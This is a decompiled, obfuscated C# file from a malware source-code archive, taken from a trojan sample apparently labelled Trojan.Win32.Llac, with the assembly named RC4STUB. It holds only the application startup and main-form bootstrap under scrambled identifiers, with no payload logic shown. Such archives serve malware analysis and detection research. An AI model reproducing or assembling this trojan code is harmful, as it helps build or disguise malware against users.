MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6/_0004/_0002.cs

47 lines
1.4 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4bd99f8fe4adcd07
// MVID: DA5B8577-1DEE-425A-83B8-F58DDD172F9B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6.exe
using \u0005;
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace \u0004
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class \u0002 : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static void \u0003([In] string[] obj0)
{
try
{
\u001C\u0002.\u009E\u0003(\u0017\u0003.\u0013());
}
finally
{
}
\u009B.\u007E\u0011((object) \u0001.\u0003(), obj0);
}
public \u0002()
: base(AuthenticationMode.Windows)
{
\u0095.\u007E\u0018((object) this, false);
\u0095.\u007E\u0017((object) this, true);
\u0095.\u007E\u0015((object) this, true);
\u0008\u0003.\u007E\u0016((object) this, ShutdownMode.AfterMainFormCloses);
}
protected override void OnCreateMainForm() => \u000F\u0002.\u007E\u0012((object) this, (Form) \u0001.\u0003().\u0003());
}
}